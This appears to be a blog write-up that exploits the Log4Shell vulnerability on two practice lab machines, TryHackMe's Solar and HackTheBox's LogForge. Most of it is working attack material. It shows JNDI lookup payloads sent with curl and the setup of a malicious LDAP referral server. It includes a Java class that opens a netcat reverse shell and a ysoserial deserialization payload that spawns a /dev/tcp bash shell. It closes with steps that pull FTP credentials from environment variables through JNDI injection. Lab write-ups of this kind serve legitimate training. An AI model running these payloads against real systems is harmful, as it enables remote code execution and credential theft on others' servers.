Exploiting log4jshell(CVE-2021–44228)- solar(THM) and logforge(HTB)

5 min readDec 17, 2021


Hi readers, here we will be looking into exploitation of CVE-2021–44228.

THM- solar


Start the lab machine and let’s start with Reconnaissance-

TASK 2(Reconnaissance)

nmap -Pn -sS -p- -T4 -vvv --script discovery -sV --version-all -sC -O --max-retries 2 -oN discovery_10.10.171.12.out -vvv

Going through the results we found http is running on tcp port 8983. Service version is Apache Solr

Also we found ssh running on port 22. A simple google search of the ssh version header leads us to the Ubuntu version, which is Bionic Beaver

Task 2 answers:

TASK 3(Discovery)

Accessing the web server via browser. We get a ton of information regarding the tool/software running.

We have been provided with a zip file containing multiple log files. Answer the questions by analyzing the files.

TASK 4 and 5(POC, Exploitation)

If we try the log4jshell POC payload in the path(/admin/cores) which we have seen in the log file, we see that we are getting the connect back.


Note: We can try this POC anywhere in user controlled input which is being logged.

nc -lnvp 9999curl '$\{jndi:ldap://\}'curl '$\{jndi:rmi://\}'

Installing java 8 manually(it is a prerequisite for our ldap server() which will translate ldap requests to http):

update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_311/bin/java" 1
update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_311/bin/javac" 1
update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_311/bin/javaws" 1
update-alternatives --set java /usr/lib/jvm/jdk1.8.0_311/bin/java
update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_311/bin/javac
update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_311/bin/javaws
java -version
apt install mavenmvn clean package -DskipTests 
# This will Compile the java app @ https://github.com/mbechler/marshalsec
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer ""

Now our ldap server is running which will be forwarding the requests to http server, which will be hosting our payload!

Next step is to compile and host Exploit payload(we are using netcat reverse shell payload in this case)

public class Exploit {
static {
try {
java.lang.Runtime.getRuntime().exec("nc -e /bin/bash 9999");
} catch (Exception e) {
javac Exploit.java -source 8 -target 8

Now it’s time to pwn the server :)

curl '$\{jndi:ldap://\}'

HTB- logforge

Apache reverse proxy bypass:;/manager/html/expire?path=/

Finding out tomcat using log4j…

Using JNDI-Exploit-Kit(https://github.com/pimps/JNDI-Exploit-Kit) and ysoserial-modified(https://github.com/pimps/ysoserial-modified)

a) Creating serialized object-

java -jar ysoserial-modified.jar CommonsCollections5 bash 'sh -i >& /dev/tcp/ 0>&1' > /mnt/Ethical_Hacking/Box/APNA/Everything/Ethical_Hacking/Practice_LABS/hackthebox/Machines/LogForge-

b) Using JNDI Injection Exploit Kit to setup the LDAP Server-

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L -P /mnt/Ethical_Hacking/Box/APNA/Everything/Ethical_Hacking/Practice_LABS/hackthebox/Machines/LogForge-

c) Getting Reverse shell-


d) Finding java based ftp server running-

e) Testing ftp server for jndi injection-

f) Checking out java based ftp server source code:

Here we found password and username is being stored in environment variables and we can read these using jndi injection!

g) Reading environment variables. The way this works is our ldap server will be getting this in logs but we don’t hv any functionality for this, So we will use Wireshark to see the traffic:


ftp username is ippsec

Similarly we can get password:


Other useful info:


Thanks for reading!






Computer Security Enthusiast.Definitely not an expert. Usually plays HTB (ID-23862). https://www.youtube.com/@pswalia2u https://www.linkedin.com/in/pswalia2u/